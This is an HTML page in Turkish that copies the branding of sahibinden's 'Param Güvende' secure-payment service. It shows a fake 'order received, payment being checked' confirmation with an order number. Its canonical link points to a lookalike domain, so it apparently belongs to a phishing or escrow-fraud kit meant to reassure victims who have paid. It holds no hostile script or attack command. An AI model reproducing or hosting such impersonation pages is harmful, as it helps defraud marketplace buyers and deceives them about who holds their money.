
<html class="" lang="tr">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
  <meta name="referrer" content="no-referrer-when-downgrade">
  <meta id="Content-Language" http-equiv="Content-Language" content="tr">
  <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  <meta name="imagetoolbar" content="no">
  <meta property="og:title" content="Ödeme başarılı sahibinden">
  <meta property="og:site_name" content="sahibinden">
  <link rel="shortcut icon" href="assets/favicon.ico">
  <meta name="description" content="Ödeme başarılı">
  <meta name="robots" content="NOODP,index,follow,noarchive">
  <meta name="apple-mobile-web-app-capable" content="yes">
    <title>Sahibinden - Satılık, Kiralık, 2. El, Emlak, Oto, Araba, Bilgisayar, Film, Cep Telefonu, Elektronik, Antika, Giyim, Mobilya, Eleman Arayanlar ve daha fazlası - İlan ve alışverişte ilk adres</title>
	<link rel="canonical" href="https://trget-paranguvende.com/sahibinden-detay/okey.html" />
<!-- asset manager injected css [common] -->
<link href="../assets/common_6704a8465f36031b36455597b21210ba.css" media="screen, print" rel="stylesheet" type="text/css">
<!-- asset manager injected css [parisPayment] -->
<link href="../assets/parisPayment_1cf8603a8208b13e1c59afa30617bef1.css" media="screen, print" rel="stylesheet" type="text/css">
<!-- bundles -->
<div class="header-container without-background">
    <div class="header secure-payment">
        <p class="clearfix">
            </p>
            <h1>Ödeme Bilgileri</h1>
            </div>
    </div>
<div id="container">
    <!-- For SAFE Dialog Codes-->
    <div class="set-payment-container set-payment-active-step-4">
        <div class="payment-progress">
            <div class="bar"></div>
            <ul>
                <!-- .step-0 is a fake -->
                <li class="step-0"></li>
                <li class="step-1">
                    <strong>1</strong>
                    <span>Ürün</span>
                    <span class="responsive-part">Ürün</span>
                </li>
                <li class="step-2">
                    <strong>2</strong>
                    <span>Adres</span>
                    <span class="responsive-part">Adres</span>
                </li>
                <li class="step-3">
                    <strong>3</strong>
                    <span>Ödeme</span>
                    <span class="responsive-part">Ödeme</span>
                </li>
                <li class="step-4">
                    <strong>4</strong>
                    <span class="last">Ödeme Alındı</span>
                    <span class="responsive-part">Ödeme Alındı</span>
                </li>
            </ul>
        </div>
<div class="set-payment-step-4-detail">
    <div class="left-box">
        <div class="sub-left-box credit-card-box">
            <div class="address-header">
    <h3>ÖDEMENİZ KONTROL EDİLİYOR</h3>
    <a href="#" class="installmentsInfoLink">Param Güvende</a>
</div>
<div id="creditCardPayment" class="paymentTypes">
    <form id="paymentWithCreditCardForm" class="sahibinden-trackable-form" data-track-form="GET" data-track-form-name="odeme" action="https://secure.sahibinden.com/param-guvende/odeme-yap/kredikarti" method="POST" autocomplete="off"><input id="itemId" name="itemId" type="hidden" value="62c5c8e23691e72e729abfb6"><input id="userToken" name="userToken" type="hidden" value=""><input id="creditCardPaymentAddressId" name="addressId" type="hidden" value=""><input id="commissionAmount" name="commissionAmount" type="hidden" value="0.0"><input id="parisFee" name="parisFee" value="1999.95" type="hidden"><input type="hidden" id="hasCCProfile" name="hasCCProfile" value="false" disabled="">
        <!-- Include ActivationRequirements HTML -->
<div class="credit-card-form">
    <div class="left-column">
        <div class="card-info">
          <p style="color: #2E8B57;"><br>
            <img src="../sahibinden-detay/assets/yes.png" width="13px" height="13px" /> <b>SİPARİŞİNİZ ALINDI.</b> <br><br>
            <b>Ödemeniz onaylandıktan sonra siparişiniz onaylanacaktır.</b><br><br>
            Siparişiniz muhasebe departmanımız tarafından onaylandıktan sonra ürün kargo işlemleri başlamış olacaktır. Siparişiniz ile ilgili bilgiler SMS yoluyla tarafınıza gönderilecektir.<br><br>
            <b>Sipariş Numaranız:  </b><a>162562947467</a>
          </p>
          <br><br>
            <center><img src="../sahibinden-detay/assets/guven.jpg" width="70%" /></center>
        </div>
        <div class="expiration-column">
            <br>
            <div class="expireMonth">
              <br>      </div>
            <div class="expireYear">
                    </div>
        </div>
        <div class="cvc2-column">
          <br>      </div>
    </div>
</div>
    </form></div></div>
</div>
</div>
</div>
